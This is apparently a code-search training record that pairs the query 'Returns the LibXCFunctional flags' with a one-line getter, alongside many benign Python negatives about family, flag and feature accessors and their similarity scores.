"def test_family(self):\n\n for name in TEST_NAMES:\n self.colorspace.setFamily(name)\n self.assertEqual(name, self.colorspace.getFamily())", "def family(self) -> AddressFamily:\n return self.raw_socket.family", "def test_03_GetFamilyObj2(self):\n self.m_device_obj.DeviceFamily = TESTING_FAMILY_NAME_2\n l_obj = FamUtil._get_family_obj(self.m_pyhouse_obj, self.m_device_obj)\n # print(PrettyFormatAny.form(l_obj, 'B2-03-A - Family'))\n self.assertEqual(l_obj.Name, TESTING_FAMILY_NAME_2)\n self.assertEqual(l_obj.Active, True)\n self.assertEqual(l_obj.Key, 2)\n self.assertEqual(l_obj.FamilyDevice_ModuleName, 'UPB_device')\n self.assertEqual(l_obj.FamilyPackageName, 'Modules.Families.UPB')\n self.assertEqual(l_obj.FamilyXml_ModuleName, 'UPB_xml')", "def test_get_family_method(self):\n _el = MarkerId('test-name')\n self.assertEqual(_el.getFamilly(), 'test')", "def address_family(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"address_family\")", "def test_01_GetFamilyObj0(self):\n self.m_device_obj.DeviceFamily = TESTING_FAMILY_NAME_0\n l_obj = FamUtil._get_family_obj(self.m_pyhouse_obj, self.m_device_obj)\n # print(PrettyFormatAny.form(l_obj, 'B2-01-A - Family object'))\n self.assertEqual(l_obj.Name, TESTING_FAMILY_NAME_0)\n self.assertEqual(l_obj.Active, True)\n self.assertEqual(l_obj.Key, 0)\n self.assertEqual(l_obj.FamilyDevice_ModuleName, 'Null_device')\n self.assertEqual(l_obj.FamilyPackageName, 'Modules.Families.Null')\n self.assertEqual(l_obj.FamilyXml_ModuleName, 'Null_xml')", "def test_column_family_name_generation(self):\r\n class TestModel(Model):\r\n id = columns.UUID(primary_key=True, default=lambda:uuid4())\r\n text = columns.Text()\r\n\r\n assert TestModel.column_family_name(include_keyspace=False) == 'test_model'", "def get_stock(self):\n return 'geo-show-family'", "def AddressFamily(self) -> AddressFamily:", "def get_family_repr(self):\r\n return \"%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\n\" % (self.trf_id,\r\n self.trf_period,\r\n self.trf_array_length,\r\n self.trf_array_gc,\r\n self.trf_pvar,\r\n self.trf_gi,\r\n self.trf_l_ind,\r\n self.trf_r_ind,\r\n self.trf_chr,\r\n self.trf_repbase,\r\n self.trf_superfamily,\r\n self.trf_family,\r\n self.trf_subfamily)", "def isFunctionalEntity(*args):\n return _libsbml.SBO_isFunctionalEntity(*args)", "def test_03_Family(self):\n l_xml 
= self.m_xml.light\n l_device = self.m_device_obj\n l_light = FamUtil.read_family_data(self.m_pyhouse_obj, l_device, l_xml)\n # print(PrettyFormatAny.form(l_light, 'C4-03-A - Light'))\n self.assertEqual(str(l_light.UPBAddress), TESTING_UPB_ADDRESS)", "def function(self):\n return self.devicefuncs[self._funcname]", "def FamilyCheck(legacy_flags, new_flags):\n\n global Asm\n\n family = dec.Asm.AVR_Family\n\n if family <= 4:\n # A legacy family name was used\n if family == 4:\n # XMega can do it all\n return True\n if family == 3 and (legacy_flags & 4):\n # Mega family allowed\n return True\n if family == 2 and (legacy_flags & 2):\n # AVR family allowed\n return True\n if family == 1 and (legacy_flags & 1):\n # Tiny family allowed\n return True\n # Instruction was is not a member of the selected family\n return False\n\n else:\n # A new family name was used\n if family == 5 and (new_flags & 1):\n # Member of reduced instructionset family\n return True\n if family == 6 and (new_flags & 2):\n # Member of minimal core instructionset family\n return True\n if family == 7 and (new_flags & 4):\n # Member of classic8k family\n return True\n if family == 8 and (new_flags & 8):\n # Member of classic128k family\n return True\n if family == 9 and (new_flags & 16):\n # Member of enhanced8k family\n return True\n if family == 10 and (new_flags & 32):\n # Member of enhanced128k family\n return True\n if family == 11 and (new_flags & 64):\n # Member of enhanced4M family\n return True\n # Instruction was is not a member of the selected family\n return False", "def get_scoped_to_feature() -> Iterable[Feature] | Feature | None:\n return Feature.METRICS", "def get_family_id(self):\n # Implemented from template for osid.resource.ResourceLookupSession.get_bin_id\n return self._catalog_id", "def get_family_id(self):\n # Implemented from template for osid.resource.ResourceLookupSession.get_bin_id\n return self._catalog_id", "def get_family_id(self):\n # Implemented from template for osid.resource.ResourceLookupSession.get_bin_id\n return self._catalog_id", "def check_family(self):\n self._check_family()", "def validate_family(self, key, new_family): # pylint: disable=unused-argument\n\n if new_family not in ExclFamily.__members__.values():\n raise ValueError('Invalid family')\n\n if self.value:\n if new_family == ExclFamily.network:\n ip_network(self.value)\n if new_family == ExclFamily.regex:\n try:\n re.compile(self.value)\n except re.error:\n raise ValueError('Invalid regex')\n\n return new_family", "def fortran_function(self) -> str:\n return ''.join([i.fortran_function() for i in self.instances])", "def getSpeciesFeatureType(self):\n return _libsbml.SpeciesFeature_getSpeciesFeatureType(self)", "def family_id(self):\n\n return self._family_id", "def get_creature_family(self, region, namespace, id, **filters):\n filters['namespace'] = namespace\n return self.get_resource('data/wow/creature-family/{0}', region, *[id], **filters)", "def address_family(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"address_family\")", "def get_fs_type(self):\n\t\treturn call_sdk_function('PrlFsInfo_GetFsType', self.handle)", "def get_family_hierarchy(self):\n # Implemented from template for\n # osid.resource.BinHierarchySession.get_bin_hierarchy\n if self._catalog_session is not None:\n return self._catalog_session.get_catalog_hierarchy()\n return self._hierarchy_session.get_hierarchy()", "def get_family_hierarchy(self):\n # Implemented from template for\n # osid.resource.BinHierarchySession.get_bin_hierarchy\n if 
self._catalog_session is not None:\n return self._catalog_session.get_catalog_hierarchy()\n return self._hierarchy_session.get_hierarchy()", "def getFunction(self) -> ghidra.program.model.listing.Function:\n ...", "def get_family(self, family_id):\n # Implemented from template for\n # osid.resource.BinLookupSession.get_bin\n if self._catalog_session is not None:\n return self._catalog_session.get_catalog(catalog_id=family_id)\n collection = JSONClientValidated('relationship',\n collection='Family',\n runtime=self._runtime)\n # Need to consider how to best deal with the \"phantom root\" catalog issue\n if family_id.get_identifier() == PHANTOM_ROOT_IDENTIFIER:\n return self._get_phantom_root_catalog(cat_class=objects.Family, cat_name='Family')\n try:\n result = collection.find_one({'_id': ObjectId(self._get_id(family_id, 'relationship').get_identifier())})\n except errors.NotFound:\n # Try creating an orchestrated Family. Let it raise errors.NotFound()\n result = self._create_orchestrated_cat(family_id, 'relationship', 'Family')\n\n return objects.Family(osid_object_map=result, runtime=self._runtime, proxy=self._proxy)", "def fstype(self):\n return self._properties.get('fstype')", "def get_fluorescence(self):\n return self._lib.StGetFluorFlg()", "def list_flavors(cls):\n return cls.dbdriver.list_flavors()", "def address_family(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"address_family\")", "def getSpeciesFeatureType(self, *args):\n return _libsbml.MultiSpeciesType_getSpeciesFeatureType(self, *args)", "def use_federated_family_view(self):\n # Implemented from template for\n # osid.resource.ResourceLookupSession.use_federated_bin_view\n self._use_federated_catalog_view()", "def use_federated_family_view(self):\n # Implemented from template for\n # osid.resource.ResourceLookupSession.use_federated_bin_view\n self._use_federated_catalog_view()", "def test_04_GetDeviceName3(self):\n self.m_device_obj.Name = TESTING_FAMILY_NAME_3\n # print(PrettyFormatAny.form(self.m_device_obj, 'B1-04-A - Device'))\n l_name = family_utils._get_device_name(self.m_device_obj)\n # print(PrettyFormatAny.form(l_name, 'B1-04-B - Family'))\n self.assertEqual(l_name, TESTING_FAMILY_NAME_3)", "def _get_flint_func(cls, domain):\n if domain == ZZ:\n return flint.fmpz_mat\n elif domain == QQ:\n return flint.fmpq_mat\n else:\n raise NotImplementedError(\"Only ZZ and QQ are supported by DFM\")", "def supported_firmware_interfaces(self):\n return [fake.FakeFirmware] + super().supported_firmware_interfaces", "def getName(self):\n return _libsbml.SpeciesFeatureType_getName(self)", "def get_tested_func(self):\n t_ast = [x for x in self.AST.ext if type(x) is c_ast.FuncDef and x.decl.name == self.Fname]\n if len(t_ast) < 1:\n raise Exception(\"Func is not in ast\")\n else:\n return t_ast[0]", "def test_family_is_listed_in_gwf(self):\n url = 'http://fonts.googleapis.com/css?family=%s' % self.metadata['name'].replace(' ', '+')\n fp = requests.get(url)\n self.assertTrue(fp.status_code == 200, 'No family found in GWF in %s' % url)\n self.assertEqual(self.metadata.get('visibility'), 'External')", "def GetFlavor(params):\n flavors = {\n 'cygwin': 'win',\n 'win32': 'win',\n 'darwin': 'mac',\n }\n if 'flavor' in params:\n return params['flavor']\n if sys.platform in flavors:\n return flavors[sys.platform]\n if sys.platform.startswith('sunos'):\n return 'solaris'\n if sys.platform.startswith('freebsd'):\n return 'freebsd'\n if sys.platform.startswith('openbsd'):\n return 'openbsd'\n if 
sys.platform.startswith('netbsd'):\n return 'netbsd'\n if sys.platform.startswith('aix'):\n return 'aix'\n if sys.platform.startswith('zos'):\n return 'zos'\n if sys.platform.startswith('os390'):\n return 'zos'\n return 'linux'", "def test_02_GetDeviceName1(self):\n self.m_device_obj.Name = TESTING_FAMILY_NAME_1\n # print(PrettyFormatAny.form(self.m_device_obj, 'B1-02-A - Device'))\n l_name = family_utils._get_device_name(self.m_device_obj)\n # print(PrettyFormatAny.form(l_name, 'B1-02-B - Family'))\n self.assertEqual(l_name, TESTING_FAMILY_NAME_1)", "def get(self, *args):\n return _libsbml.ListOfSpeciesFeatureTypes_get(self, *args)", "def show_flavors():\n return get_flavors()", "def check_fam(x):\n func_arr = [is_triangle, is_square, is_penta, is_hexa, is_hepta, is_octa]\n for i in xrange(len(func_arr)):\n if func_arr[i](x):\n return i\n return None", "def getSpeciesFeature(self, *args):\n return _libsbml.MultiSpeciesPlugin_getSpeciesFeature(self, *args)", "def parse_os_family(os_key):\n\n if os_key in lookup_data.legacy_os_keys:\n os_key = lookup_data.legacy_os_keys[os_key]\n\n return lookup_data.os_keys.get(os_key, 'Unknown')", "def test_03_GetDeviceName2(self):\n self.m_device_obj.Name = TESTING_FAMILY_NAME_2\n # print(PrettyFormatAny.form(self.m_device_obj, 'B1-03-A - Device'))\n l_name = family_utils._get_device_name(self.m_device_obj)\n # print(PrettyFormatAny.form(l_name, 'B1-03-B - Family'))\n self.assertEqual(l_name, TESTING_FAMILY_NAME_2)", "def test_01_GetDeviceName0(self):\n self.m_device_obj.Name = TESTING_FAMILY_NAME_0\n # print(PrettyFormatAny.form(self.m_device_obj, 'B1-01-A - Device'))\n l_name = family_utils._get_device_name(self.m_device_obj)\n # print(PrettyFormatAny.form(l_name, 'B1-01-B - Family'))\n self.assertEqual(l_name, TESTING_FAMILY_NAME_0)", "def feature():\n pass", "def functional(self):\n return self.__functional", "def get(self, *args):\n return _libsbml.ListOfSpeciesFeatures_get(self, *args)", "def get_type(self):\n\t\treturn call_sdk_function('PrlFsInfo_GetType', self.handle)", "def column_family_name(cls, include_keyspace=True):\r\n cf_name = ''\r\n if cls.__table_name__:\r\n cf_name = cls.__table_name__.lower()\r\n else:\r\n # get polymorphic base table names if model is polymorphic\r\n if cls._is_polymorphic and not cls._is_polymorphic_base:\r\n return cls._polymorphic_base.column_family_name(include_keyspace=include_keyspace)\r\n\r\n camelcase = re.compile(r'([a-z])([A-Z])')\r\n ccase = lambda s: camelcase.sub(lambda v: '{}_{}'.format(v.group(1), v.group(2).lower()), s)\r\n\r\n cf_name += ccase(cls.__name__)\r\n #trim to less than 48 characters or cassandra will complain\r\n cf_name = cf_name[-48:]\r\n cf_name = cf_name.lower()\r\n cf_name = re.sub(r'^_+', '', cf_name)\r\n if not include_keyspace: return cf_name\r\n return '{}.{}'.format(cls._get_keyspace(), cf_name)", "def describe(self):\n\n ret = []\n ret.append(\"Functional ID: %s\" % self._number)\n ret.append(\"Functional Name: %s\" % self._xc_func_name)\n ret.append(\"Attributes:\")\n ret.append(\" Name: %s\" % self._name)\n ret.append(\" Kind: %d\" % self._kind)\n ret.append(\" Family: %d\" % self._family)\n ret.append(\"Citations:\")\n for x in self._refs:\n ret.append(\" \" + x)\n\n return \"\\n\".join(ret)", "def getQualitativeSpecies(self):\n return _libsbml.Input_getQualitativeSpecies(self)", "def test_get_family_method_without_dash(self):\n _el = MarkerId('testname')\n self.assertEqual(_el.getFamilly(), 'testname')", "def families(self):\n\n return [get_target_family_by_id(i) for i in 
self._family_ids]", "def _func(self):\n return self._get_flint_func(self.domain)", "def get_upgrade_flavour():\n if detect_sap_hana():\n return LEAPP_UPGRADE_FLAVOUR_SAP_HANA\n return LEAPP_UPGRADE_FLAVOUR_DEFAULT", "def get_upgrade_flavour():\n if detect_sap_hana():\n return LEAPP_UPGRADE_FLAVOUR_SAP_HANA\n return LEAPP_UPGRADE_FLAVOUR_DEFAULT", "def parse_browser_family(browser_key):\n return lookup_data.browser_keys.get(browser_key, 'Unknown')", "def get_type(self):\n return self.get_udev_property('ID_FS_TYPE')", "def flair_type(is_link: bool) -> str:\n return \"LINK_FLAIR\" if is_link else \"USER_FLAIR\"" ]
[ "0.6671878", "0.66315264", "0.6380709", "0.6380162", "0.62706983", "0.62706983", "0.62412816", "0.62412816", "0.62412816", "0.6231695", "0.6231695", "0.6231695", "0.6102895", "0.6017814", "0.5974126", "0.5966167", "0.58548194", "0.57114094", "0.5633405", "0.5601125", "0.5577917", "0.55569565", "0.552615", "0.54889655", "0.5476718", "0.5444216", "0.5440335", "0.54299563", "0.5403442", "0.5388547", "0.53666675", "0.53655916", "0.5317977", "0.5316432", "0.53106785", "0.52571374", "0.52181745", "0.5213806", "0.5204987", "0.5202174", "0.5189843", "0.51861906", "0.5166618", "0.5122363", "0.5094495", "0.5063327", "0.5058643", "0.5053712", "0.50488144", "0.50488144", "0.50488144", "0.5009678", "0.4985976", "0.49730277", "0.4961353", "0.49541324", "0.4951114", "0.4937758", "0.49241802", "0.4918371", "0.4918371", "0.4906773", "0.48974067", "0.4893709", "0.48673132", "0.48619926", "0.48595077", "0.4850317", "0.48333538", "0.48333538", "0.4825217", "0.4824032", "0.48201442", "0.47958606", "0.47821662", "0.4771752", "0.4768188", "0.47656652", "0.4762086", "0.47416645", "0.47297978", "0.47277784", "0.4722869", "0.47166753", "0.4712041", "0.47090793", "0.4701759", "0.47013775", "0.47011295", "0.46971858", "0.46916208", "0.46905586", "0.46879914", "0.46846652", "0.4677427", "0.46712923", "0.46712923", "0.46661612", "0.46638718", "0.46624297" ]
document_score: 0.68424135
document_rank: 0
query: Returns the LibXCFunctional flags.
document: def get_flags(self): return self._flags
metadata: { "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def feature_flags(self):\r\n return self.env_tokens.get('FEATURES', dict())", "def get_flags(cls):\n return cls.get_short_flag(), cls.get_flag()", "def get_flags(self):\n return self.short_flag, self.long_flag", "def get_system_flags(self):\n\t\treturn call_sdk_function('PrlVmCfg_GetSystemFlags', self.handle)", "def flags(self) -> Optional[int]:\n return self.get(\"/Ff\")", "def list_flags(self):\n return self._defs.items()", "def flags(self):\n return self._flags", "def flags(self):\n return c.Flags(self)", "def get_feature_flags(self, account, signing_account=None):\n account = Account(account, hive_instance=self.hive)\n feature_flags = self._conveyor_method(account, signing_account,\n \"conveyor.get_feature_flags\",\n [account['name']])\n if \"result\" in feature_flags:\n return feature_flags[\"result\"]\n else:\n return feature_flags", "def supported_features(self):\n return SUPPORT_FLAGS", "def supported_features(self):\n return SUPPORT_FLAGS", "def supported_features(self):\n return SUPPORT_FLAGS", "def supported_features(self):\n return SUPPORT_FLAGS", "def supported_features(self):\n return self._support_flags", "def supported_features(self):\n return self._support_flags", "def supported_features(self):\n return self._support_flags", "def supported_features(self):\n return self._support_flags", "def flags(self,index):\n return self._flags", "def flags(self):\n return list(self._flags_generator())", "def _flags(self):\n done, data = self._request('GE')\n if done:\n flags = int(data[1], 16)\n else:\n raise EvseError\n return {\n 'service_level': (flags & 0x0001) + 1,\n 'diode_check': not flags & 0x0002,\n 'vent_required': not flags & 0x0004,\n 'ground_check': not flags & 0x0008,\n 'stuck_relay_check': not flags & 0x0010,\n 'auto_service_level': not flags & 0x0020,\n 'auto_start': not flags & 0x0040,\n 'serial_debug': not not flags & 0x0080,\n 'lcd_type': 'monochrome' if flags & 0x0100 else 'rgb',\n 'gfi_self_test': not flags & 0x0200\n }", "def flags(self):\n if self._flags is None:\n raise ValueError('Flags are not available since dataset '\n 'was opened with metadata only')\n return self._flags", "def flags(self):\n flags = self.Flags\n return [x for x in self.FLAGS_VALUES if flags & x]", "def flags(self):\n return self.__flag_set", "def get_flags(self):\n\n if self.raw.flags not in [0, 1, 2, 3]:\n raise ValueError(\"Invalid raw flags: {}\".format(self.raw.flags))\n\n flags = set()\n\n if (self.raw.flags & 0b010) > 0:\n flags.add(\"DF\")\n\n if (self.raw.flags & 0b001) > 0:\n flags.add(\"MF\")\n\n return frozenset(flags)", "def flags(self):\n return self.ast_node.flags", "def _get_fortran_flags(\n target,\n fc,\n fflags,\n debug,\n double=False,\n sharedobject=False,\n osname=None,\n verbose=False,\n):\n flags = []\n\n # define fortran flags\n if fc is not None:\n # remove .exe extension of necessary\n fc = _get_base_app_name(fc)\n\n # remove target .exe extension, if necessary\n target = _get_base_app_name(target)\n\n # get lower case OS string\n if osname is None:\n osname = _get_osname()\n\n # get - or / to prepend for compiler switches\n prepend = _get_prepend(fc, osname)\n\n # generate standard fortran flags\n if fc == \"gfortran\":\n if sharedobject:\n if osname != \"win32\":\n flags.append(\"fPIC\")\n else:\n if osname == \"win32\":\n flags.append(\"static\")\n if \"fPIC\" in flags:\n flags.remove(\"fPIC\")\n flags.append(\"fbacktrace\")\n if debug:\n flags += [\"g\", \"fcheck=all\", \"fbounds-check\", \"Wall\"]\n if _check_gnu_switch_available(\"-ffpe-trap\", 
verbose=verbose):\n flags.append(\"ffpe-trap=overflow,zero,invalid,denormal\")\n else:\n if _check_gnu_switch_available(\"-ffpe-summary\"):\n flags.append(\"ffpe-summary=overflow\")\n if _check_gnu_switch_available(\"-ffpe-trap\"):\n flags.append(\"ffpe-trap=overflow,zero,invalid\")\n if double:\n flags += [\"fdefault-real-8\", \"fdefault-double-8\"]\n # define the OS macro for gfortran\n os_macro = _get_os_macro(osname)\n if os_macro is not None:\n flags.append(os_macro)\n elif fc in [\"ifort\", \"mpiifort\"]:\n if osname == \"win32\":\n flags += [\"heap-arrays:0\", \"fpe:0\", \"traceback\", \"nologo\"]\n if debug:\n flags += [\"debug:full\", \"Zi\"]\n if double:\n flags += [\"real-size:64\", \"double-size:64\"]\n else:\n if sharedobject:\n flags.append(\"fPIC\")\n else:\n if \"fPIC\" in flags:\n flags.remove(\"fPIC\")\n if debug:\n flags += [\"g\"]\n flags += [\"no-heap-arrays\", \"fpe0\", \"traceback\"]\n if double:\n flags += [\"r8\", \"autodouble\"]\n\n # process passed fortran flags - check for flags with a space between\n # the flag and a setting\n for idx, flag in enumerate(fflags[1:]):\n if flag[0] not in (\"/\", \"-\"):\n fflags[idx] += \" {}\".format(flag)\n fflags[idx + 1] = \"\"\n\n # Add passed fortran flags - assume that flags have - or / as the\n # first character. fortran flags starting with O are excluded\n for flag in fflags:\n if len(flag) < 1:\n continue\n if flag[1] != \"O\":\n if flag[1:] not in flags:\n flags.append(flag[1:])\n\n # add target specific fortran switches\n tlist = _set_fflags(target, fc=fc, argv=False, osname=osname)\n if tlist is not None:\n for flag in tlist:\n if flag[1] != \"O\":\n if flag[1:] not in flags:\n flags.append(flag[1:])\n\n # add prepend to compiler flags\n for idx, flag in enumerate(flags):\n flags[idx] = prepend + flag\n\n return flags", "def format_flags(self):\n flags = []\n if self.is_unique:\n flags.append('Unique')\n if self.is_weak:\n flags.append('Weak')\n if self.is_ctor:\n flags.append('Constructor')\n if self.is_warning:\n flags.append('Warning')\n if self.is_ref:\n flags.append('Indirect reference')\n if self.is_reloc:\n flags.append('Reloc function')\n if self.is_debug:\n flags.append('Debug')\n if self.is_dynamic:\n flags.append('Dynamic')\n if self.is_func:\n flags.append('Function')\n if self.is_file:\n flags.append('File')\n if self.is_object:\n flags.append('Object')\n return flags", "def flags(self):\r\n return flags.FaqFlags(self)", "def hive_flags(self):\n return self.unpack_dword(0x8)", "def flags(self) -> list[\"ProjectCommandFlag\"]:\n _args: list[Arg] = []\n _ctx = self._select(\"flags\", _args)\n _ctx = ProjectCommandFlag(_ctx)._select_multiple(\n _description=\"description\",\n _name=\"name\",\n )\n return _ctx.execute_sync(list[ProjectCommandFlag])", "def flags(self):\n data = struct.pack('=I', self.FileFlags & self.FileFlagsMask)\n addr_space = addrspace.BufferAddressSpace(self.obj_vm.get_config(), 0, data)\n bitmap = {'Debug': 0,\n 'Prerelease': 1,\n 'Patched': 2,\n 'Private Build': 3,\n 'Info Inferred': 4,\n 'Special Build' : 5,\n }\n return obj.Object('Flags', offset = 0, vm = addr_space, bitmap = bitmap)", "def test_get_all_flags(self):\n include_prefixes = ['-I']\n db = CppProperties(include_prefixes)\n\n expected = [\n Flag('-I', path.normpath('/folder/include/path')),\n Flag('-I', path.normpath('/another/file/path')),\n ]\n\n scope = SearchScope(from_folder=_get_test_folder('simple'))\n self.assertEqual(expected, db.get_flags(search_scope=scope))", "def test_flags(self):\n d = 
self._examineOrSelect()\n self._response(\n b'* FLAGS (\\\\Answered \\\\Flagged \\\\Deleted \\\\Seen \\\\Draft)')\n self.assertEqual(\n self.successResultOf(d), {\n 'READ-WRITE': False,\n 'FLAGS': ('\\\\Answered', '\\\\Flagged', '\\\\Deleted', '\\\\Seen',\n '\\\\Draft')})", "def flags(self) -> UserFlag:", "def flags(self) -> undefined.UndefinedOr[UserFlag]:", "def hive_flags(self):\n return self.unpack_dword(0x90)", "def features(self) -> Optional[pulumi.Input['DevToolPortalFeatureSettingsArgs']]:\n return pulumi.get(self, \"features\")", "def get_all_flags(options):\n flags = []\n if options.inputFlag:\n flags.append(try_to_int(options.inputFlag))\n if options.outputFlags:\n for flag in options.outputFlags:\n flags.append(try_to_int(flag))\n return flags", "def use_flags(*funcs):\n\n global GLOBAL_STATUS\n if funcs:\n GLOBAL_STATUS.discard('ERRORS')\n GLOBAL_STATUS.add('FLAGS')\n else:\n GLOBAL_STATUS.discard('ERRORS')\n GLOBAL_STATUS.discard('FLAGS')\n\n for name in _get_func_names(funcs):\n if 'error' not in name and 'flag' not in name:\n globals()[name] = globals()[name].flag", "def supported_features(self) -> int:\n return self._support_flags", "def get_current_cpu_flags() -> Set[str]:\n\n cpuinfo = get_cpuinfo()\n flags = extract_cpu_flags(cpuinfo)\n return flags", "def read_flags():\n return flag_args", "def get_flags():\n flags.DEFINE_string(\n 'model_name',\n help='MobileNet version name: mobilenet_v1, mobilenet_v2, '\n 'mobilenet_v3_small and mobilenet_v3_large',\n default='mobilenet_v1'\n )\n flags.DEFINE_string(\n 'dataset_name',\n help='Dataset name from TDFS to train on: imagenette, imagenet2012',\n default='imagenette'\n )\n flags.DEFINE_string(\n 'model_dir',\n help='Working directory.',\n default='./tmp'\n )\n flags.DEFINE_string(\n 'data_dir',\n help='Directory for training data.',\n default=None\n )\n flags.DEFINE_bool(\n 'resume_checkpoint',\n help='Whether resume training from previous checkpoint.',\n default=False\n )\n flags.DEFINE_string(\n 'optimizer_name',\n help='Name of optimizer.',\n default='rmsprop'\n )\n flags.DEFINE_string(\n 'learning_scheduler_name',\n help='Name of learning rate scheduler.',\n default='exponential'\n )\n # for hyperparameter tuning\n flags.DEFINE_float(\n 'op_momentum',\n help='Optimizer momentum.',\n default=0.9\n )\n flags.DEFINE_float(\n 'op_decay_rate',\n help='Optimizer discounting factor for gradient.',\n default=0.9\n )\n flags.DEFINE_float(\n 'lr',\n help='Base learning rate.',\n default=0.008\n )\n flags.DEFINE_float(\n 'lr_decay_rate',\n help='Magnitude of learning rate decay.',\n default=0.97\n )\n flags.DEFINE_float(\n 'lr_decay_epochs',\n help='Frequency of learning rate decay.',\n default=2.4\n )\n flags.DEFINE_float(\n 'label_smoothing',\n help='The amount of label smoothing.',\n default=0.0,\n )\n flags.DEFINE_float(\n 'ma_decay_rate',\n help='Exponential moving average decay rate.',\n default=None\n )\n flags.DEFINE_float(\n 'dropout_rate',\n help='Dropout rate.',\n default=0.2\n )\n flags.DEFINE_float(\n 'std_weight_decay',\n help='Standard weight decay.',\n default=0.00004\n )\n flags.DEFINE_float(\n 'truncated_normal_stddev',\n help='The standard deviation of the truncated normal weight initializer.',\n default=0.09\n )\n flags.DEFINE_float(\n 'batch_norm_decay',\n help='Batch norm decay.',\n default=0.9997\n )\n flags.DEFINE_integer(\n 'batch_size',\n help='Training batch size.',\n default=4 # for testing purpose\n )\n flags.DEFINE_integer(\n 'epochs',\n help='Number of epochs.',\n default=5\n )", "def 
GetAGWFlags(self):\r\n \r\n return self._agwFlags", "def process_flags(self):\n\t\tsflags = []\n\t\tfor attr in dir(self):\n\t\t\tif attr[:3] != \"PF_\":\n\t\t\t\tcontinue\n\t\t\tvalue = getattr(self, attr)\n\t\t\tif value & self.fields[\"flags\"]:\n\t\t\t\tsflags.append(attr)\n\n\t\treturn sflags", "def fan_modes(self) -> list[str] | None:\n return FAN_OPERATION_LIST", "def database_flags(self) -> Sequence['outputs.DatabaseFlagsResponse']:\n return pulumi.get(self, \"database_flags\")", "def supported_features(self):\n return GH_SUPPORT_FLAGS", "def GetAGWFlags(self):\r\n\r\n return self._agwFlags", "def GetAGWFlags(self):\r\n\r\n return self._agwFlags", "def GetAGWFlags(self):\r\n\r\n return self._agwFlags", "def GetAGWFlags(self):\r\n\r\n return self._agwFlags", "def flags(self):\n\n return FlagSetAttr(self)", "def test_getlist(self):\n flags = flag_lists(appversions={\"code\": \"fx1.0\"})\n eq_(flags, {(\"fx\", \"pl\"): [0],\n (\"fx\", \"de\"): [1],\n (\"fx\", \"fr\"): [2],\n (\"fx\", \"da\"): [1, 0]})", "def SrlbFlags(self):\r\n\t\treturn self._get_attribute('srlbFlags')", "def or_cpp_flags(self, flags):\n flags_dict = {\"deprecated\": \"vtable::common_::deprecated\",\n \"hidden\": \"vtable::common_::hidden\",\n \"unprivileged\": \"vtable::common_::unprivileged\",\n \"no_reply\": \"vtable::method_::no_reply\"}\n\n cpp_flags = []\n for flag in flags:\n try:\n cpp_flags.append(flags_dict[flag])\n except KeyError:\n raise ValueError(\"Invalid flag \\\"{}\\\"\".format(flag))\n\n return \" | \".join(cpp_flags)", "def getdefflags(config_nm):\n if config_nm is 'train':\n user_params = user_params_train\n elif config_nm is 'eval':\n user_params = user_params_eval\n elif config_nm is 'tfrecorder':\n user_params = user_params_recorder\n else:\n print('Unrecognized configuration name : %s, exiting ....' 
% config_nm)\n exit(-1)\n\n\n return mandatory_params+user_params", "def _build_flags(deploy):\n\n flags = ['R' if deploy['running'] else 'S',\n 'E' if deploy['enabled'] else 'D']\n\n if 'running' in deploy['container_status']:\n flags.append('r' if deploy['container_status']['running'] else 's')\n else:\n flags.append('-')\n\n flags.append('C' if 'callback_uri' in deploy else '-')\n\n return \"\".join(flags)", "def getFeatures(self, state, action):\n util.raiseNotDefined()", "def parseFlags(self):\n # Blank return value.\n retVal = \"\"\n \n try:\n # Store flags as we parse them.\n allFlags = []\n \n # Get the accumulator flag.\n accFlag = self.__flags & self.f_accum\n trendFlag = self.__flags & self.f_trend\n modeFlag = self.__flags & self.f_mode\n \n # Complete set of readings?\n if accFlag == self.f_accum_complete:\n # Completed loading values into the accumulator.\n allFlags.append('C')\n elif accFlag == self.f_accum_accum:\n # Still accumulating.\n allFlags.append('A')\n elif accFlag == self.f_accum_unk:\n # Unknown.\n allFlags.append('?')\n else:\n # Bad value.\n allFlags.append('!')\n \n # Trend?\n if (trendFlag) == self.f_trend_stable:\n # Readings stable.\n allFlags.append('S')\n elif (trendFlag) == self.f_trend_up:\n # Still accumulating.\n allFlags.append('U')\n elif (trendFlag) == self.f_trend_dn:\n # Still accumulating.\n allFlags.append('D')\n elif (trendFlag) == self.f_trend_unk:\n # Still accumulating.\n allFlags.append('?')\n else:\n # Bad value.\n allFlags.append('!')\n \n # Mode?\n if modeFlag == self.f_mode_fast:\n # Fast\n allFlags.append('F')\n elif modeFlag == self.f_mode_slow:\n # Slow\n allFlags.append('S')\n elif modeFlag == self.f_mode_counter:\n # Stream\n allFlags.append('C')\n elif modeFlag == self.f_mode_scaler:\n # Roll\n allFlags.append('L')\n else:\n # Bad value.\n allFlags.append('!')\n \n # Build a nice string.\n retVal = ''.join(allFlags)\n \n \n except:\n raise\n \n # Return value.\n return retVal", "def getFlags(self, label):\n\n flags = self._getFlags(label)\n if flags is not None:\n return flags.copy()", "def flags(self):\n from mkidpipeline.pipeline import PIPELINE_FLAGS # This must be here to prevent a circular import!\n\n names = self.query_header('flags')\n if not names:\n getLogger(__name__).warning('Flag names were not attached at time of H5 creation. '\n 'If beammap flags have changed since then things WILL break. 
'\n 'You must recreate the H5 file.')\n names = PIPELINE_FLAGS.names\n self.enablewrite()\n self.update_header('flags', names)\n self.disablewrite()\n\n f = FlagSet.define(*[(n, i, PIPELINE_FLAGS.flags[n].description if n in PIPELINE_FLAGS.flags else '')\n for i, n in enumerate(names)])\n return f", "def get_status():\n return ('off', 'off')", "def __int__(self):\n\n return self.bitflags", "def supported_features(self):\n return self._supported_features", "def source_flags(self):\n return self.ast_node.source_flags", "def wake_flags(self):\n\n res = self.read_block(REG_WAKE_FLAGS, 1)\n\n ret = {k: bool(res[0] & v) for k, v in WAKE_FLAGS.iteritems()}\n\n return ret", "def supported_features(self):\n return SUPPORT_TARGET_TEMPERATURE | SUPPORT_FAN_MODE", "def runtime_enabled_flags(self):\n raise exceptions.NotImplementedError()", "def fan_modes(self) -> list[str]:\n return [FAN_AUTO, FAN_ON]", "def flagged(self) -> Sequence[str]:\r\n return self._flagged", "def support_opset(self) -> Collection[OpsetVersion]:\n return list(self._functions)", "def get_scoped_to_feature() -> Iterable[Feature] | Feature | 